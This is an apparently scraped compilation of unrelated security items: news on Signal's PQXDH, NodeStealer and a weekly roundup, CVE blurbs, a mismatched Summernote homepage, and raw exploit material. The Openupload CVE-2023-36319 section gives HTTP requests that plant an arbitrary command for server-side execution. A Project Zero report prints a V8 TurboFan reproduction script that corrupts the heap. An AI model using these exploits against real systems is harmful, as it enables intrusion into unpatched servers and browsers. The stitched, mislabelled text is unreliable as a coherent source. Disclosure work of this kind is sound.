An XPC misconfiguration vulnerability in CoreCode MacUpdater before 2.3.8, and 3.x before 3.1.2, allows attackers to escalate privileges by crafting malicious .pkg files.

CVE-2023-41902: MacUpdater Version History

Encrypted messaging app Signal has announced an update to the Signal Protocol to add support for quantum resistance by upgrading the Extended Triple Diffie-Hellman (X3DH) specification to Post-Quantum Extended Diffie-Hellman (PQXDH).
"With this upgrade, we are adding a layer of protection against the threat of a quantum computer being built in the future that is powerful enough to break current

Encrypted messaging app Signal has announced an update to the Signal Protocol to add support for quantum resistance by upgrading the Extended Triple Diffie-Hellman (X3DH) specification to Post-Quantum Extended Diffie-Hellman (PQXDH).

"With this upgrade, we are adding a layer of protection against the threat of a quantum computer being built in the future that is powerful enough to break current encryption standards," Signal's Ehren Kret said.

The development comes weeks after Google added support for quantum-resistant encryption algorithms in its Chrome web browser and announced a quantum-resilient FIDO2 security key implementation as part of its OpenSK security keys initiative last month.

The Signal Protocol is a set of cryptographic specifications that provides end-to-end encryption (E2EE) for private text and voice communications. It's used in various messaging apps like WhatsApp and Google's encrypted RCS messages for Android.

While quantum computers are unlikely to go mainstream anytime soon, existing cryptosystems are vulnerable to a threat known as Harvest Now, Decrypt Later (HNDL), in which the data that's encrypted today could be decrypted in the future using a quantum computer.

Put differently, a threat actor could steal scrambled sensitive data from targets of interest and stash it, thereby allowing the malicious party to harness the power of a quantum computer when it becomes available to compute a private key from a public key and break open the encrypted content.

To counter such threats, the U.S. Department of Commerce's National Institute of Standards and Technology (NIST) chose CRYSTALS-Kyber as the post-quantum cryptographic algorithm for general encryption.

But instead of completely porting over to CRYSTALS-Kyber, Signal's PQXDH takes a hybrid approach like that of Google, combining the elliptic curve key agreement protocol X25519 with Kyber-1024, which aims for a security roughly equivalent to AES-256.

UPCOMING WEBINAR

Level-Up SaaS Security: A Comprehensive Guide to ITDR and SSPM

Stay ahead with actionable insights on how ITDR identifies and mitigates threats. Learn about the indispensable role of SSPM in ensuring your identity remains unbreachable.

Supercharge Your Skills

"The essence of our protocol upgrade from X3DH to PQXDH is to compute a shared secret, data known only to the parties involved in a private communication session, using both the elliptic curve key agreement protocol X25519 and the post-quantum key encapsulation mechanism CRYSTALS-Kyber," Kret explained.

"We then combine these two shared secrets together so that any attacker must break both X25519 and CRYSTALS-Kyber to compute the same shared secret."

The non-profit said that the new protocol is already supported by the latest versions of the client applications, and that it plans to disable X3DH for new chats and require PQXDH for all new chats "after sufficient time has passed for everyone using Signal to update."

"PQXDH establishes a shared secret key between two parties who mutually authenticate each other based on public keys," Signal said. "PQXDH provides post-quantum forward secrecy and a form of cryptographic deniability but still relies on the hardness of the discrete log problem for mutual authentication in this revision of the protocol."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Signal Messenger Introduces PQXDH Quantum-Resistant Encryption

File Upload vulnerability in Openupload Stable v.0.4.3 allows a remote attacker to execute arbitrary code via the action parameter of the compress-inc.php file.

**CVE-2023-36319**

By modifying the compression plug-in command, the attacker can cause the server to execute arbitrary commands during the upload process.

**Only used for authorized security testing, please do not use it for illegal purposes. Violations have nothing to do with the author.**

**Affected version:**

openupload Stable version 0.4.3

**Step one**

Log in to the backend and click on the function: Administration ->Plugins ->compress

Add new “command” directive and save:

    POST /index.php HTTP/1.1
    Host: www.test.com
    Content-Length: 183
    Cache-Control: max-age=0
    Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    action=adminpluginsoptions&step=4&id=compress&gid=admins&command=<YOUR CMD>&extension=&compression=
    

**Step two**

Enter the "File upload" function, upload a random file, and ensure "compress=0" in the parameters.

    POST /index.php HTTP/1.1
    Host: www.test.com
    Content-Length: 53
    Cache-Control: max-age=0
    Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    action=u&step=3&description=123&emailme=no&compress=0
    

The commands we write will be executed normally.

CVE-2023-36319: GitHub - Lowalu/CVE-2023-36319: exp4CVE-2023-36319

Cross Site Scripting vulnerability in Summernote Rich Text Editor v.0.8.18 and before allows a remote attacker to execute arbitrary code via a crafted script to the insert link function in the editor component.

**Super Simple WYSIWYG  
Editor on Bootstrap**

hi,  
we are summernote.  
please, write text here!  
super simple WYSIWYG editor on Bootstrap

**Easy to Install**

Simply download and attach your js, css with bootstrap.

**Customization**

Customize by Initializing various options and modules.  

**Examples**

See all useful features of summernote in action.

**Open Source**

Summernote is licensed under MIT and maintained by the community.

**Integration**

Integrate it with any back-end. 3rd parties available in django, rails, angular.

**Features**

*   Supports Bootstrap 3.x.x to 5.x.x
*   Lightweight (js+css: 100Kb)
*   Smart User Interaction
*   Works in all Major Browsers:
    *   Safari, Chrome, Firefox, Opera, Edge and Internet Explorer 9+
*   Works in all Major Operating Systems:
    *   Windows, MacOS, Linux

**Donate**

**Ad**

We're using BrowserStack for testing!

**Much appreciate to all contributors! Together and further...**

Contributors

CVE-2023-42371: Summernote - Super Simple WYSIWYG editor

Plus: Spyware-packing ads, TikTok GDPR violations, Elon Musk investigations, and more.

China-linked hackers are increasingly moving beyond espionage and into the disturbing world of power grid attacks. Threat researchers at security software firm Symantec this week released new evidence that the Chinese hacking group known as APT41 infiltrated the power grid of an Asian nation. Some details of the latest intrusion echo a 2021 attack on India’s power grid, suggesting the same hackers are responsible.

In Argentina, a scandal is playing out over the use of facial recognition software in Buenos Aires. Despite laws that require authorities to limit searches to known fugitives, an investigation by a judge found that the system was used to look up people not wanted for any crimes. In other cases, errors led police to arrest or question the wrong people. While Buenos Aires is attempting to get the system back online after legal rulings ordered it turned off, the debacle shows how dangerous facial recognition can be even when laws are in place to limit it.

Facial recognition isn’t the only artificial-intelligence-powered system governments are using in new and upsetting ways. Like everyone else, state and local governments around the United States have begun to play with generative AI tools like ChatGPT. And so far, there’s no consensus on how to use the technology. Some US states, like Maine, have temporarily banned its use altogether, fearing cybersecurity concerns, while others are using it to craft speeches and social media posts.

Meanwhile, the US Senate is in the midst of getting an AI education. Around 60 senators attended a closed-door briefing this week, where they heard from major tech CEOs, including Elon Musk, Mark Zuckerberg, and Sam Altman, as well as civil liberties advocates and AI ethics experts. The Senate has been learning about AI and its myriad issues for much of the year, and another forum on AI innovation is scheduled for later this year. Despite these cramming sessions, some lawmakers question whether they’re any closer to tackling AI responsibly.

Finally, the cyberattack against MGM casinos continues to cause havoc for guests of its resorts nearly a week after the attack began. While an attack on a major casino company is inevitably high-profile, the group behind the breach, known as Alphv, has a long history of targeting schools and hospitals—attacks that are far more consequential.

That’s not all. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories, and stay safe out there.

Unless you updated your browser in the past few days, it likely contains a critical flaw. The recently disclosed vulnerability exists in the WebP code library known as libwebp, which encodes and decodes images in the widely used WebP format. Known generally as a “heap buffer overflow,” the flaw can be exploited using a specially crafted malicious image, allowing an attacker to run malicious code on a targeted device. Google says the bug has already been exploited in the wild.

Initially identified early this week as a zero-day vulnerability in Google’s Chrome browser, the libwebp bug impacts browsers built using Chromium, which means Chrome, Mozilla’s Firefox, Microsoft Edge, Opera, Brave, and more. It also affects apps like Telegram, 1Password, Thunderbird, and Gimp. Patches for the flaw are rolling out now, so keep your eyes peeled for updates.

Malicious online ads—also known as “malvertising”—have been around for years. Now, they’re going pro. Several Israeli companies are developing exploits that take advantage of weaknesses in the technical mechanisms that bombard you with ads online, _Haaretz_ reports, allowing attackers to track people and hack their devices. The exploit takes advantage of the online advertising bidding process, in which bots are competing for specific ad slots on web pages in real time. Taking advantage of the fraction of a second before an ad slot is filled, these companies have figured out how to show you an ad that reportedly contains “advanced spyware.” While there’s no quick fix for stopping the spread of this malware, there is something simple you can do to protect yourself: Use an ad blocker.

European data regulators fined TikTok €345 million ($368 million) this week for breaking laws related to the privacy of underage users. The Irish Data Protection Commission (DPC) said the company violated GDPR by failing to make the accounts of child users private by default. The DPC also says TikTok’s “family pairing” feature, which enables an adult to take control of a child’s account settings, did not ensure that the adult with access to the feature was a parent or guardian. TikTok says it opposes the fine because it had updated its settings to make the accounts of anyone under 16 years old private by default before the investigation began.

Turns out, secretly interfering in the battle plans of a United States ally doesn’t go over well in Washington. The US Senate Armed Services Committee has launched an inquiry into Elon Musk’s decision to not enable Starlink satellite communications in Crimea ahead of a Ukrainian military attack on Russian forces. The move, first revealed in author Walter Isaacson’s new biography on Musk, also prompted several Democratic senators to send a letter to the US defense secretary, Lloyd Austin, asking him to explain what actions the Department of Defense (DOD) has taken, or plans to take, to “prevent further dangerous meddling” by Musk.

“SpaceX is a prime contractor and a critical industry partner for the \[DOD\] and the recipient of billions of dollars in taxpayer funding,” the letter reads. “We are deeply concerned with the ability and willingness of SpaceX to interrupt their service at Mr. Musk’s whim and for the purpose of handcuffing a sovereign country’s self-defense, effectively defending Russian interests.”

Even if you have a spotless record, passing a background check can be one of the most stressful parts of landing a new job or an apartment. We have bad news: It’s possible the information used to assess your eligibility might not be accurate. The US Federal Trade Commission (FTC) this week announced a $5.8 million fine against background check providers TruthFinder and Instant Checkmate for “failing to ensure the maximum possible accuracy of their consumer reports,” a violation of the Fair Credit Reporting Act. The FTC alleges that the companies “made millions” by selling subscriptions that would alert people when a “criminal record” was found in their background check, “when the record was merely a traffic ticket.” The company also displayed “Remove” and “Flag as Inaccurate” buttons that the FTC says “did not work as advertised.”

The regulatory ding against TruthFinder and Instant Checkmate comes several months after the companies confirmed a data breach. In January, hackers leaked the personal information of millions of customers by leaking an April 2019 database backup stolen from the companies.

You Need to Update Google Chrome or Whatever Browser You Use

Microsoft Edge (Chromium-based) Spoofing Vulnerability

CVE-2023-36727

Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability

CVE-2023-36735

CVE-2023-36562

Chrome suffers from a read-only property overwrite in TurboFan.

    Chrome: Read-only property overwrite in TurboFanVULNERABILITY DETAILSWhile collecting information for a property store, TurboFan bails out if the property isn't writable[2]. Unfortunately, the branch condition[1] does not include one of the store modes, namely `kDefine`. This allows an attacker to overwrite arbitrary non-configurable, read-only properties. It takes a few extra steps to convince TurboFan to compile a vulnerable function -- see the reproduction case section.This issue can be abused to trigger a type confusion in `JsonStringifier::Serialize_`. The function assumes that a `JSRawJson` object can only have a string as its `rawJSON` property value, because `JSRawJson::Create` freezes the object[3] before returning it to the user. Therefore, `Serialize_` doesn't perform a type check before casting the result of `GetProperty` to the string type[4]. `AppendString` might then attempt to concatenate the bogus string[5], corrupting the heap.REFERENCEShttps://source.chromium.org/chromium/chromium/src/+/refs/heads/main:v8/src/compiler/access-info.cc;drc=5992439d25f71ce29efa8db1c699b99e8773d41f;l=708```PropertyAccessInfo AccessInfoFactory::ComputePropertyAccessInfo(    MapRef map, NameRef name, AccessMode access_mode) const {[...]  while (true) {    PropertyDetails details = PropertyDetails::Empty();    InternalIndex index = InternalIndex::NotFound();    if (!TryLoadPropertyDetails(map, holder, name, &index, &details)) {      return Invalid();    }    if (index.is_found()) {      if (access_mode == AccessMode::kStore ||  // *** 1 ***          access_mode == AccessMode::kStoreInLiteral) {        DCHECK(!map.is_dictionary_map());        // Don't bother optimizing stores to read-only properties.        if (details.IsReadOnly()) return Invalid();  // *** 2 ***[...]}```https://source.chromium.org/chromium/chromium/src/+/main:v8/src/objects/js-raw-json.cc;drc=93e93056e3849e78a8c77fe6fd0c2a0983a0b3f4;l=17```MaybeHandle<JSRawJson> JSRawJson::Create(Isolate* isolate,                                         Handle<Object> text) {  DCHECK(v8_flags.harmony_json_parse_with_source);  Handle<String> json_string;  ASSIGN_RETURN_ON_EXCEPTION(isolate, json_string,                             Object::ToString(isolate, text), JSRawJson);  Handle<String> flat = String::Flatten(isolate, json_string);  if (String::IsOneByteRepresentationUnderneath(*flat)) {    if (!JsonParser<uint8_t>::CheckRawJson(isolate, flat)) {      DCHECK(isolate->has_pending_exception());      return MaybeHandle<JSRawJson>();    }  } else {    if (!JsonParser<uint16_t>::CheckRawJson(isolate, flat)) {      DCHECK(isolate->has_pending_exception());      return MaybeHandle<JSRawJson>();    }  }  Handle<JSObject> result =      isolate->factory()->NewJSObjectFromMap(isolate->js_raw_json_map());  result->InObjectPropertyAtPut(JSRawJson::kRawJsonInitialIndex, *flat);  JSObject::SetIntegrityLevel(isolate, result, FROZEN, kThrowOnError).Check();  // *** 3 ***  return Handle<JSRawJson>::cast(result);}```https://source.chromium.org/chromium/chromium/src/+/main:v8/src/json/json-stringifier.cc;drc=221294ce14cb14f84afa156f3c590700bc615dc1;l=530```JsonStringifier::Result JsonStringifier::Serialize_(Handle<Object> object,                                                    bool comma,                                                    Handle<Object> key) {[...]  InstanceType instance_type =      HeapObject::cast(*object).map(cage_base).instance_type();  switch (instance_type) {[...]    case JS_RAW_JSON_TYPE:      DCHECK(v8_flags.harmony_json_parse_with_source);      if (deferred_string_key) SerializeDeferredKey(comma, key);      {        Handle<JSRawJson> raw_json_obj = Handle<JSRawJson>::cast(object);        Handle<String> raw_json;        if (raw_json_obj->HasInitialLayout(isolate_)) {          // Fast path: the object returned by JSON.rawJSON has its initial map          // intact.          raw_json = Handle<String>::cast(handle(              raw_json_obj->InObjectPropertyAt(JSRawJson::kRawJsonInitialIndex),              isolate_));        } else {          // Slow path: perform a property get for \"rawJSON\". Because raw JSON          // objects are created frozen, it is still guaranteed that there will          // be a property named \"rawJSON\" that is a String. Their initial maps          // only change due to VM-internal operations like being optimized for          // being used as a prototype.          raw_json = Handle<String>::cast(  // *** 4 ***              JSObject::GetProperty(isolate_, raw_json_obj,                                    isolate_->factory()->raw_json_string())                  .ToHandleChecked());        }        builder_.AppendString(raw_json); // *** 5 ***      }[...]}```VERSIONGoogle Chrome 114.0.5735.90 (Official Build) V8 version 11.6.0REPRODUCTION CASE```const PROP_NAME = \"rawJSON\",      PROP_VALUE = 0x21212121;  // Will be interpreted as a compressed pointer by `Serialize_`.let define_property_holder = {};define_property_holder.for_deprecation = 1;  // See below.function ReturnHolder() { return define_property_holder; };class Trigger extends ReturnHolder {  // Extend a function that returns a value so that it possible                                      // to store on an existing object.  [PROP_NAME] = (     // A keyed class property initializer is translated to a `kDefine` store.    this[PROP_NAME],  // The store operation performed on the target object will always throw in                      // the interpreter, so the object's map won't be added to the feedback slot.                      // Emit a load so that its feedback map can be reused by the store.    PROP_VALUE  )};for (let i = 0; i < 10; ++i)  new Trigger;  // The store operation has to have a non-empty feedback slot. Use a regular object                // with the writable target property for that.define_property_holder.for_deprecation = 1.1;  // Deprecate the map in the feedback vector so that                                               // it's discarded by TurboFan.define_property_holder = JSON.rawJSON(\"1\");    // The special target object.try { new Trigger } catch { }  // Add the target object map to the load operation's feedback slot.%OptimizeFunctionOnNextCall(Trigger);new Trigger;JSON.stringify(define_property_holder);```CREDIT INFORMATIONSergei Glazunov of Google Project ZeroThis bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2023-09-05.Related CVE Numbers: CVE-2023-4352.Found by: glazunov@google.com

Chrome Read-Only Property Overwrite

An ongoing campaign is targeting Facebook Business accounts with bogus messages to harvest victims' credentials using a variant of the Python-based NodeStealer and potentially take over their accounts for follow-on malicious activities. 
"The attacks are reaching victims mainly in Southern Europe and North America across different segments, led by the manufacturing services and technology

Online Security / Malware

An ongoing campaign is targeting Facebook Business accounts with bogus messages to harvest victims' credentials using a variant of the Python-based **NodeStealer** and potentially take over their accounts for follow-on malicious activities.

"The attacks are reaching victims mainly in Southern Europe and North America across different segments, led by the manufacturing services and technology sectors," Netskope Threat Labs researcher Jan Michael said in an analysis published Thursday.

First documented by Meta in May 2023, NodeStealer originated as a JavaScript malware capable of pilfering cookies and passwords from web browsers to compromise Facebook, Gmail, and Outlook accounts.

Palo Alto Networks Unit 42, last month, revealed a separate attack wave that took place in December 2022 using a Python version of the malware, with select iterations also designed to conduct cryptocurrency theft.

The latest findings from Netskope suggest the Vietnamese threat actors behind the operation have likely resumed their attack efforts, not to mention adopt tactics used by other adversaries operating out of the country with the same objectives.

Just earlier this week, Guardio Labs disclosed how fraudulent messages sent via Facebook Messenger from a botnet of fake and hijacked personal accounts are being leveraged to deliver ZIP or RAR archive files to deliver the stealer malware to unsuspecting recipients.

The same modus operandi acts as the initial vector for the NodeStealer intrusion chains to distribute RAR files hosted on Facebook's content delivery network (CDN).

"Images of defective products were used as bait to convince owners or admins of Facebook business pages to download the malware payload," Michael explained.

UPCOMING WEBINAR

Identity is the New Endpoint: Mastering SaaS Security in the Modern Age

Dive deep into the future of SaaS security with Maor Bin, CEO of Adaptive Shield. Discover why identity is the new endpoint. Secure your spot now.

Supercharge Your Skills

These archives come fitted with a batch script that, when executed, opens the Chrome web browser and takes the victim to a benign web page. But in the background, a PowerShell command is run to retrieve additional payloads, including the Python interpreter and the NodeStealer malware.

The stealer, besides capturing credentials and cookies – regardless of whether it is from Facebook or not – from various web browsers, is designed to gather system metadata and exfiltrate the information over Telegram.

"Compared to earlier variants, the new NodeStealer variant uses batch files to download and run Python scripts, and steal credentials and cookies from multiple browsers and for multiple websites," Michael said.

"This campaign might be a doorway to a more targeted attack later on since they have already gathered useful information. Attackers who have stolen Facebook cookies and credentials can use them to take over the account, make fraudulent transactions leveraging the legitimate business page."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#chrome